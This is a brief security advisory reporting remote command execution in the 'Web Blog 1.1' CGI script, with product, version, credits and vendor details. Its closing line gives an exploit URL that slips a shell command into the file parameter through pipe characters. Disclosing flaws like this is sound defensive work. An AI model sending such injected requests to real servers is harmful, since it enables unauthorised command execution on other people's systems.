Web Blog 1.1 allows for remote command execution due to an unsanitized file variable.
e0af8c56d3430aa463075d8e02f7ec239fa8e7490a1451b1eb83f2d3a80af5a9
Product:
Web Blog 1.1 Remote Execute Commands Bug
Affected Versions:
1.1.5
Bug:
Command Remote Execution
Credits:
n3rd - Lit Security Solutions (LiSS)
#Affix in irc.brasnet.org
Vendor:
http://leifwright.com
Exploiting:
http://address/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=|command|